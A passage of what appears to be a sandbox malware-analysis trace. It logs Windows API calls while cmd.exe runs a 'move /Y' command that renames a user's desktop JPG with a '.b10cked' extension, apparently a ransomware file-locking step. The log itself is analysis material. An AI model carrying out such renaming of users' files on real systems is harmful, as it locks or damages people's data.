phkResult=0x30febc | out: phkResult=0x30febc*=0x0) returned 0x2 [0141.915] VirtualQuery (in: lpAddress=0x30fef3, lpBuffer=0x30fe8c, dwLength=0x1c | out: 
lpBuffer=0x30fe8c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.915] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fe8c, dwLength=0x1c | out: lpBuffer=0x30fe8c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.915] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fe8c, dwLength=0x1c | out: lpBuffer=0x30fe8c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.915] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fe8c, dwLength=0x1c | out: lpBuffer=0x30fe8c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.915] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fe8c, dwLength=0x1c | out: lpBuffer=0x30fe8c*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0141.915] GetConsoleOutputCP () returned 0x1b5 [0141.915] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.915] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.915] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.915] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.916] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.916] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.916] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.916] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0141.916] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.917] GetEnvironmentStringsW () returned 0x110180* [0141.917] FreeEnvironmentStringsW (penv=0x110180) returned 1 [0141.917] GetEnvironmentStringsW () returned 0x110180* [0141.917] FreeEnvironmentStringsW (penv=0x110180) returned 1 [0141.917] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee2c | out: phkResult=0x30ee2c*=0x40) returned 0x0 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0xa8, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x1, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0x1, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x0, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x40, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.917] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x40, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.918] 
RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0x40, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.918] RegCloseKey (hKey=0x40) returned 0x0 [0141.918] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee2c | out: phkResult=0x30ee2c*=0x40) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0x40, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x1, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0x1, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x0, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x9, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x4, lpData=0x30ee38*=0x9, lpcbData=0x30ee30*=0x4) returned 0x0 [0141.918] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, 
lpType=0x30ee34, lpData=0x30ee38, lpcbData=0x30ee30*=0x1000 | out: lpType=0x30ee34*=0x0, lpData=0x30ee38*=0x9, lpcbData=0x30ee30*=0x1000) returned 0x2 [0141.918] RegCloseKey (hKey=0x40) returned 0x0 [0141.918] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.918] srand (_Seed=0x5b886370) [0141.918] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked\"" [0141.918] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked\"" [0141.918] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.919] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1118e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.919] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.919] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.919] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.919] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.919] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.919] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.919] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.919] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.919] _wcsicmp (_String1="PROMPT", _String2="TIME") returned 
-4 [0141.919] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.919] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.919] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.919] GetEnvironmentStringsW () returned 0x1122d0* [0141.920] FreeEnvironmentStringsW (penv=0x1122d0) returned 1 [0141.920] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.920] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.920] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.920] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.920] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.920] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.920] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.920] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.920] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.920] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.920] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30fbf8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.920] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30fbf8, lpFilePart=0x30fbf4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30fbf4*="Desktop") returned 0x18 [0141.920] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.920] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f974 | out: lpFindFileData=0x30f974) returned 0x110010 [0141.920] FindClose (in: hFindFile=0x110010 | out: hFindFile=0x110010) returned 1 [0141.921] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f974 
| out: lpFindFileData=0x30f974) returned 0x110010 [0141.921] FindClose (in: hFindFile=0x110010 | out: hFindFile=0x110010) returned 1 [0141.921] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f974 | out: lpFindFileData=0x30f974) returned 0x110010 [0141.921] FindClose (in: hFindFile=0x110010 | out: hFindFile=0x110010) returned 1 [0141.921] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.921] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.921] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.921] GetEnvironmentStringsW () returned 0x112af0* [0141.921] FreeEnvironmentStringsW (penv=0x112af0) returned 1 [0141.921] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.922] GetConsoleOutputCP () returned 0x1b5 [0141.922] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.922] GetUserDefaultLCID () returned 0x409 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fd38, cchData=128 | out: lpLCData="0") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fd38, cchData=128 | out: lpLCData="0") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fd38, cchData=128 | out: lpLCData="1") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | 
out: lpLCData="Tue") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.923] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.923] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.924] GetConsoleTitleW (in: lpConsoleTitle=0x1008e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.925] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.925] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.925] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.925] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.926] _wcsicmp (_String1="move", _String2=")") returned 68 [0141.926] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0141.926] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0141.926] _wcsicmp (_String1="IF", _String2="move") returned -4 [0141.926] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0141.926] _wcsicmp (_String1="REM", _String2="move") returned 5 [0141.926] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0141.929] GetConsoleTitleW (in: 
lpConsoleTitle=0x30fa30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.318] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0142.318] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0142.318] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0142.318] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0142.318] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0142.318] _wcsicmp (_String1="move", _String2="CD") returned 10 [0142.318] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0142.318] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0142.318] _wcsicmp (_String1="move", _String2="REN") returned -5 [0142.318] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0142.318] _wcsicmp (_String1="move", _String2="SET") returned -6 [0142.318] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0142.318] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0142.318] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0142.318] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0142.318] _wcsicmp (_String1="move", _String2="MD") returned 11 [0142.318] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0142.318] _wcsicmp (_String1="move", _String2="RD") returned -5 [0142.318] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0142.318] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0142.318] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0142.318] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0142.318] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0142.319] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0142.319] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0142.319] _wcsicmp (_String1="move", _String2="VER") returned -9 [0142.319] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0142.319] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0142.319] _wcsicmp 
(_String1="move", _String2="SETLOCAL") returned -6 [0142.319] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0142.319] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0142.319] _wcsicmp (_String1="move", _String2="START") returned -6 [0142.319] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0142.319] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0142.319] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0142.320] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.320] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.320] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x30f7ec, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x30f7e4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x30f7e4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.320] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0142.320] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0142.320] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0142.320] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.320] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0142.321] _wcsnicmp 
(_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0142.321] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0142.321] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0142.321] _wcsicmp (_String1="BKWVSD~1.JPG", 
_String2=".") returned 52 [0142.322] _wcsicmp (_String1="BKWVSD~1.JPG", _String2="..") returned 52 [0142.322] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsd~1.jpg")) returned 0x20 [0142.322] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x111e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.322] SetErrorMode (uMode=0x0) returned 0x0 [0142.322] SetErrorMode (uMode=0x1) returned 0x0 [0142.322] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", nBufferLength=0x104, lpBuffer=0x30f174, lpFilePart=0x30f15c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", lpFilePart=0x30f15c*="BKWVSD~1.JPG") returned 0x25 [0142.322] SetErrorMode (uMode=0x0) returned 0x1 [0142.322] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.322] _wcsicmp (_String1="BKWVSD~1.JPG", _String2=".") returned 52 [0142.322] _wcsicmp (_String1="BKWVSD~1.JPG", _String2="..") returned 52 [0142.322] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsd~1.jpg")) returned 0x20 [0142.322] SetErrorMode (uMode=0x0) returned 0x0 [0142.322] SetErrorMode (uMode=0x1) returned 0x0 [0142.322] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", nBufferLength=0x104, lpBuffer=0x30f5f0, lpFilePart=0x30f388 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", lpFilePart=0x30f388*="BKWVSD~1.JPG") returned 0x25 [0142.322] SetErrorMode (uMode=0x0) returned 0x1 [0142.322] SetErrorMode (uMode=0x0) returned 0x0 [0142.322] SetErrorMode (uMode=0x1) returned 0x0 [0142.322] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30f7f8, lpFilePart=0x30f388 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked", 
lpFilePart=0x30f388*="bkwVSdvUcmd7uNf_5 x.jpg.b10cked") returned 0x38 [0142.322] SetErrorMode (uMode=0x0) returned 0x1 [0142.323] SetLastError (dwErrCode=0x0) [0142.323] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsdvucmd7unf_5 x.jpg.b10cked")) returned 0xffffffff [0142.323] GetLastError () returned 0x2 [0142.323] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x30ed04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ed04) returned 0x100e58 [0142.323] FindNextFileW (in: hFindFile=0x100e58, lpFindFileData=0x30ed04 | out: lpFindFileData=0x30ed04) returned 0 [0142.323] GetLastError () returned 0x12 [0142.323] FindClose (in: hFindFile=0x100e58 | out: hFindFile=0x100e58) returned 1 [0142.324] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x111bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x111bd8) returned 0x100e58 [0142.324] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x30ef9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked", lpFilePart=0x0) returned 0x38 [0142.324] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg", nBufferLength=0x104, lpBuffer=0x30ef9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg", lpFilePart=0x0) returned 0x30 [0142.324] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsdvucmd7unf_5 x.jpg")) returned 0x20 [0142.324] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsdvucmd7unf_5 x.jpg"), 
lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bkwvsdvucmd7unf_5 x.jpg.b10cked"), dwFlags=0x3) returned 1 [0142.606] FindClose (in: hFindFile=0x100e58 | out: hFindFile=0x100e58) returned 1 [0142.607] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30ef50 | out: _Buffer=" 1") returned 9 [0142.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.607] GetFileType (hFile=0x7) returned 0x2 [0142.607] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.607] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30eedc | out: lpMode=0x30eedc) returned 1 [0142.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.607] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30ef10 | out: lpConsoleScreenBufferInfo=0x30ef10) returned 1 [0142.607] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) 